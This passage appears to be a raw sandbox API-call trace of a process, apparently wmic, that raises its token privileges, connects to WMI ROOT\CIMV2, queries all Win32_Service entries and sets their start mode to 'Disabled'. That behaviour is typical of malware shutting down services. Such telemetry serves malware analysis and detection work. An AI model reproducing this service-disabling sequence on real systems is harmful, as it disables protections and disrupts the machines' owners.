IWbemClassObject:Get (in: This=0xa60bc0, wszName="Parameters", lFlags=0, pVal=0x82f0e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f0e0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3fa00*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa33578, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.754] IWbemClassObject:Get (in: This=0xa60bc0, wszName="VerbType", lFlags=0, pVal=0x82f078*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f078*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.754] IWbemClassObject:Get (in: This=0xa60bc0, wszName="Derivation", lFlags=0, pVal=0x82f060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.754] SafeArrayGetLBound (in: psa=0xa3fa00, nDim=0x1, plLbound=0x82f114 | out: plLbound=0x82f114) returned 0x0 [0117.754] SafeArrayGetUBound (in: psa=0xa3fa00, nDim=0x1, plUbound=0x82f130 | out: plUbound=0x82f130) returned 0x0 [0117.754] SafeArrayGetElement (in: psa=0xa3fa00, rgIndices=0x82f134, pv=0x82f140 | out: pv=0x82f140) returned 0x0 [0117.754] IWbemClassObject:Get (in: This=0xa61c58, wszName="ParaId", lFlags=0, pVal=0x82f090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f090*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.754] IWbemClassObject:Get (in: This=0xa61c58, wszName="Type", lFlags=0, pVal=0x82f028*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f028*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.754] IWbemClassObject:Get (in: This=0xa61c58, wszName="Default", lFlags=0, pVal=0x82f048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82f048*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.754] GetCurrentThreadId () returned 0xfa8 [0117.754] ??0CHString@@QAE@XZ () returned 0x82ef7c [0117.754] IWbemClassObject:Get (in: This=0xa61c58, wszName="Qualifiers", lFlags=0, pVal=0x82ef04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82ef04*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3faf0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa334f8, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.755] SafeArrayGetLBound (in: psa=0xa3faf0, nDim=0x1, plLbound=0x82ef34 | out: plLbound=0x82ef34) returned 0x0 [0117.755] SafeArrayGetUBound (in: psa=0xa3faf0, nDim=0x1, plUbound=0x82ef48 | out: plUbound=0x82ef48) returned 0x0 [0117.755] SafeArrayGetElement (in: psa=0xa3faf0, rgIndices=0x82ef54, pv=0x82ef74 | out: pv=0x82ef74) returned 0x0 [0117.755] IWbemClassObject:Get (in: This=0xa61f10, wszName="Name", lFlags=0, pVal=0x82ef1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82ef1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.755] IWbemClassObject:Get (in: This=0xa61f10, wszName="QualifierValue", lFlags=0, pVal=0x82eef4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82eef4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3fdc0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xa335a8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.755] SafeArrayGetLBound (in: psa=0xa3fdc0, nDim=0x1, plLbound=0x82ef38 | out: plLbound=0x82ef38) returned 0x0 [0117.755] SafeArrayGetUBound (in: psa=0xa3fdc0, nDim=0x1, plUbound=0x82ef18 | out: plUbound=0x82ef18) returned 0x0 [0117.755] lstrlenW (lpString="CIMTYPE") returned 7 [0117.755] lstrlenW (lpString="In") returned 2 [0117.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0117.755] lstrlenW (lpString="read") returned 4 [0117.755] lstrlenW (lpString="In") returned 2 [0117.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0117.755] lstrlenW (lpString="write") returned 5 [0117.755] lstrlenW (lpString="In") returned 2 [0117.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0117.755] lstrlenW (lpString="In") returned 2 [0117.755] lstrlenW (lpString="In") returned 2 [0117.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0117.755] SafeArrayGetElement (in: psa=0xa3fdc0, rgIndices=0x82ef60, pv=0x82ef68 | out: pv=0x82ef68) returned 0x0 [0117.755] lstrlenW (lpString="true") returned 4 [0117.755] lstrlenW (lpString="True") returned 4 [0117.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0117.755] IUnknown:Release (This=0xa61f10) returned 0x1 [0117.755] SafeArrayGetElement (in: psa=0xa3faf0, rgIndices=0x82ef54, pv=0x82ef74 | out: pv=0x82ef74) returned 0x0 [0117.755] IWbemClassObject:Get (in: This=0xa62248, wszName="Name", lFlags=0, pVal=0x82ef1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa326cc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82ef1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.755] IWbemClassObject:Get (in: This=0xa62248, wszName="QualifierValue", lFlags=0, pVal=0x82eef4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3fdc0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x82eef4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3fcd0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xa32e00, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.756] SafeArrayGetLBound (in: psa=0xa3fcd0, nDim=0x1, plLbound=0x82ef38 | out: plLbound=0x82ef38) returned 0x0 [0117.756] SafeArrayGetUBound (in: psa=0xa3fcd0, nDim=0x1, plUbound=0x82ef18 | out: plUbound=0x82ef18) returned 0x0 [0117.756] lstrlenW (lpString="CIMTYPE") returned 7 [0117.756] lstrlenW (lpString="ValueMap") returned 8 [0117.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0117.756] lstrlenW (lpString="read") returned 4 [0117.756] lstrlenW (lpString="ValueMap") returned 8 [0117.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0117.756] lstrlenW (lpString="write") returned 5 [0117.756] lstrlenW (lpString="ValueMap") returned 8 [0117.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0117.756] lstrlenW (lpString="In") returned 2 [0117.756] lstrlenW (lpString="ValueMap") returned 8 [0117.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0117.756] lstrlenW (lpString="Out") returned 3 [0117.756] lstrlenW (lpString="ValueMap") returned 8 [0117.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0117.756] SafeArrayGetElement (in: psa=0xa3fcd0, rgIndices=0x82ef60, pv=0x82ef68 | out: pv=0x82ef68) returned 0x0 [0117.756] SafeArrayGetElement (in: psa=0xa3fcd0, rgIndices=0x82ef60, pv=0x82ef68 | out: pv=0x82ef68) returned 0x0 [0117.756] SafeArrayGetElement (in: psa=0xa3fcd0, rgIndices=0x82ef60, pv=0x82ef68 | out: pv=0x82ef68) returned 0x0 [0117.756] SafeArrayGetElement (in: psa=0xa3fcd0, rgIndices=0x82ef60, pv=0x82ef68 | out: pv=0x82ef68) returned 0x0 [0117.756] SafeArrayGetElement (in: psa=0xa3fcd0, rgIndices=0x82ef60, pv=0x82ef68 | out: pv=0x82ef68) returned 0x0 [0117.756] SysStringLen (param_1="ValueMap") returned 0x8 [0117.756] SysStringLen (param_1="In") returned 0x2 [0117.756] SysStringLen (param_1="In") returned 0x2 [0117.756] SysStringLen (param_1="ValueMap") returned 0x8 [0117.756] IUnknown:Release (This=0xa62248) returned 0x1 [0117.756] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.756] IUnknown:Release (This=0xa61c58) returned 0x1 [0117.757] IUnknown:Release (This=0xa60bc0) returned 0x1 [0117.757] IUnknown:Release (This=0xa401a8) returned 0x0 [0117.757] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.757] lstrlenW (lpString="/") returned 1 [0117.757] lstrlenW (lpString="Disabled") returned 8 [0117.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0117.757] lstrlenW (lpString="-") returned 1 [0117.757] lstrlenW (lpString="Disabled") returned 8 [0117.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0117.757] lstrlenW (lpString="Disabled") returned 8 [0117.757] lstrlenW (lpString="Disabled") returned 8 [0117.757] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.757] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.757] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd77a11eb | out: _String="Select", _Context=0xd77a11eb) returned="Select" [0117.757] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a11eb | out: _String=0x0, _Context=0xd77a11eb) returned="*" [0117.757] lstrlenW (lpString="FROM") returned 4 [0117.758] lstrlenW (lpString="*") returned 1 [0117.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0117.758] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a11eb | out: _String=0x0, _Context=0xd77a11eb) returned="from" [0117.758] lstrlenW (lpString="FROM") returned 4 [0117.758] lstrlenW (lpString="from") returned 4 [0117.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0117.758] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a11eb | out: _String=0x0, _Context=0xd77a11eb) returned="Win32_Service" [0117.758] lstrlenW (lpString="SET") returned 3 [0117.758] lstrlenW (lpString="CALL") returned 4 [0117.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0117.761] lstrlenW (lpString="CREATE") returned 6 [0117.761] lstrlenW (lpString="CALL") returned 4 [0117.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0117.761] lstrlenW (lpString="GET") returned 3 [0117.761] lstrlenW (lpString="CALL") returned 4 [0117.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0117.761] lstrlenW (lpString="LIST") returned 4 [0117.761] lstrlenW (lpString="CALL") returned 4 [0117.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0117.761] lstrlenW (lpString="ASSOC") returned 5 [0117.761] lstrlenW (lpString="CALL") returned 4 [0117.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0117.762] WbemLocator:IUnknown:AddRef (This=0xa13488) returned 0x3 [0117.762] lstrlenW (lpString="") returned 0 [0117.762] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0117.762] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.762] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.762] GetCurrentThreadId () returned 0xfa8 [0117.762] GetCurrentProcess () returned 0xffffffff [0117.762] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x82fa6c | out: TokenHandle=0x82fa6c*=0x270) returned 1 [0117.762] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x82fa68 | out: TokenInformation=0x0, ReturnLength=0x82fa68) returned 0 [0117.762] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x979118, TokenInformationLength=0x118, ReturnLength=0x82fa68 | out: TokenInformation=0x979118, ReturnLength=0x82fa68) returned 1 [0117.762] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x979118*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0117.762] CloseHandle (hObject=0x270) returned 1 [0117.762] lstrlenW (lpString="GET") returned 3 [0117.762] lstrlenW (lpString="CALL") returned 4 [0117.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0117.762] lstrlenW (lpString="LIST") returned 4 [0117.762] lstrlenW (lpString="CALL") returned 4 [0117.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0117.762] lstrlenW (lpString="SET") returned 3 [0117.762] lstrlenW (lpString="CALL") returned 4 [0117.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0117.762] lstrlenW (lpString="CALL") returned 4 [0117.762] lstrlenW (lpString="CALL") returned 4 [0117.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0117.762] ??0CHString@@QAE@XZ () returned 0x82fa2c [0117.762] GetCurrentThreadId () returned 0xfa8 [0117.762] SysStringLen (param_1="\\\\") returned 0x2 [0117.762] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0117.762] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0117.762] SysStringLen (param_1="\\") returned 0x1 [0117.762] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0117.762] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0117.763] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa13488, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xa308e8) returned 0x0 [0117.769] CoSetProxyBlanket (pProxy=0xa308e8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0117.769] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.769] ??0CHString@@QAE@XZ () returned 0x82fa28 [0117.769] GetCurrentThreadId () returned 0xfa8 [0117.769] lstrlenA (lpString="") returned 0 [0117.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x9711a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0117.769] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.769] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0117.769] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd77a1297 | out: _String="Select", _Context=0xd77a1297) returned="Select" [0117.769] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a1297 | out: _String=0x0, _Context=0xd77a1297) returned="*" [0117.769] lstrlenW (lpString="FROM") returned 4 [0117.769] lstrlenW (lpString="*") returned 1 [0117.769] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0117.769] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a1297 | out: _String=0x0, _Context=0xd77a1297) returned="from" [0117.769] lstrlenW (lpString="FROM") returned 4 [0117.769] lstrlenW (lpString="from") returned 4 [0117.769] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0117.769] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd77a1297 | out: _String=0x0, _Context=0xd77a1297) returned="Win32_Service" [0117.769] IWbemServices:GetObject (in: This=0xa308e8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x82fa00*=0x0, ppCallResult=0x0 | out: ppObject=0x82fa00*=0xa8a158, ppCallResult=0x0) returned 0x0 [0117.804] IWbemClassObject:GetMethod (in: This=0xa8a158, wszName="ChangeStartMode", lFlags=0, ppInSignature=0x82fa0c, ppOutSignature=0x82f9f8 | out: ppInSignature=0x82fa0c*=0xa8a648, ppOutSignature=0x82f9f8*=0xa8a9c8) returned 0x0 [0117.804] IWbemClassObject:SpawnInstance (in: This=0xa8a648, lFlags=0, ppNewInstance=0x82fa18 | out: ppNewInstance=0x82fa18*=0xa8abc0) returned 0x0 [0117.804] IWbemClassObject:GetNames (in: This=0xa8a648, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x82fa1c | out: pNames=0x82fa1c*="\x01ƀ\x04") returned 0x0 [0117.804] SafeArrayGetLBound (in: psa=0xa3f940, nDim=0x1, plLbound=0x82f9c8 | out: plLbound=0x82f9c8) returned 0x0 [0117.804] SafeArrayGetUBound (in: psa=0xa3f940, nDim=0x1, plUbound=0x82fa10 | out: plUbound=0x82fa10) returned 0x0 [0117.804] SafeArrayGetElement (in: psa=0xa3f940, rgIndices=0x82fa04, pv=0x82fa2c | out: pv=0x82fa2c) returned 0x0 [0117.804] IWbemClassObject:GetPropertyQualifierSet (in: This=0xa8abc0, wszProperty="StartMode", ppQualSet=0x82f8ec | out: ppQualSet=0x82f8ec*=0xa3f630) returned 0x0 [0117.804] IWbemQualifierSet:Get (in: This=0xa3f630, wszName="CIMTYPE", lFlags=0, pVal=0x82f8bc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x82f8bc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0117.805] IWbemClassObject:Get (in: This=0xa8abc0, wszName="StartMode", lFlags=0, pVal=0x82f894*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x82f8d0*=8583352, plFlavor=0x0 | out: pVal=0x82f894*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x82f8d0*=8, plFlavor=0x0) returned 0x0 [0117.805] IWbemQualifierSet:Get (in: This=0xa3f630, wszName="read", lFlags=0, pVal=0x82f8d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x82f8d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0117.805] IWbemQualifierSet:Get (in: This=0xa3f630, wszName="write", lFlags=0, pVal=0x82f8d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x82f8d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0117.805] IWbemQualifierSet:Get (in: This=0xa3f630, wszName="Description", lFlags=0, pVal=0x82f8ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x82f8ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0117.805] lstrlenA (lpString="Not Available") returned 13 [0117.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0x979288, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0117.805] IUnknown:Release (This=0xa3f630) returned 0x0 [0117.805] lstrlenW (lpString="StartMode") returned 9 [0117.805] lstrlenW (lpString="StartMode") returned 9 [0117.805] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0117.805] SysStringLen (param_1="In") returned 0x2 [0117.805] SysStringLen (param_1="MaxLen") returned 0x6 [0117.805] SysStringLen (param_1="ValueMap") returned 0x8 [0117.805] SysStringLen (param_1="MaxLen") returned 0x6 [0117.805] SysStringLen (param_1="MaxLen") returned 0x6 [0117.806] SysStringLen (param_1="ValueMap") returned 0x8 [0117.806] lstrlenW (lpString="") returned 0 [0117.806] lstrlenW (lpString="STRING") returned 6 [0117.806] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0117.806] lstrlenW (lpString="string") returned 6 [0117.806] lstrlenW (lpString="STRING") returned 6 [0117.806] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0117.806] SysStringLen (param_1="In") returned 0x2 [0117.806] SysStringLen (param_1="ValueMap") returned 0x8 [0117.806] SysStringLen (param_1="ValueMap") returned 0x8 [0117.806] SysStringLen (param_1="ValueMap") returned 0x8 [0117.806] SysStringLen (param_1="ValueMap") returned 0x8 [0117.806] SysStringLen (param_1="ValueMap") returned 0x8 [0117.806] lstrlenW (lpString="Boot") returned 4 [0117.806] lstrlenW (lpString="Disabled") returned 8 [0117.806] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0117.806] lstrlenW (lpString="System") returned 6 [0117.806] lstrlenW (lpString="Disabled") returned 8 [0117.806] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0117.806] lstrlenW (lpString="Automatic") returned 9 [0117.806] lstrlenW (lpString="Disabled") returned 8 [0117.806] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0117.806] lstrlenW (lpString="Manual") returned 6 [0117.806] lstrlenW (lpString="Disabled") returned 8 [0117.806] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0117.806] lstrlenW (lpString="Disabled") returned 8 [0117.806] lstrlenW (lpString="Disabled") returned 8 [0117.806] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0117.806] IWbemClassObject:GetPropertyQualifierSet (in: This=0xa8abc0, wszProperty="StartMode", ppQualSet=0x82f8f4 | out: ppQualSet=0x82f8f4*=0xa3f478) returned 0x0 [0117.806] IWbemQualifierSet:Get (in: This=0xa3f478, wszName="CIMTYPE", lFlags=0, pVal=0x82f8d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x82f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0117.806] IWbemClassObject:Get (in: This=0xa8abc0, wszName="StartMode", lFlags=0, pVal=0x82f8c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x82f8e8*=8582760, plFlavor=0x0 | out: pVal=0x82f8c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x82f8e8*=8, plFlavor=0x0) returned 0x0 [0117.806] IUnknown:Release (This=0xa3f478) returned 0x0 [0117.807] lstrlenW (lpString="string") returned 6 [0117.807] lstrlenW (lpString="string") returned 6 [0117.807] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0117.807] IWbemClassObject:Put (This=0xa8abc0, wszName="StartMode", lFlags=0, pVal=0x82f98c*(varType=0x8, wReserved1=0x0, wReserved2=0x5558, wReserved3=0x130, varVal1="Disabled", varVal2=0x0), Type=0) returned 0x0 [0117.807] IUnknown:Release (This=0xa8a648) returned 0x0 [0117.807] IUnknown:Release (This=0xa8a9c8) returned 0x0 [0117.807] IUnknown:Release (This=0xa8a158) returned 0x0 [0117.807] 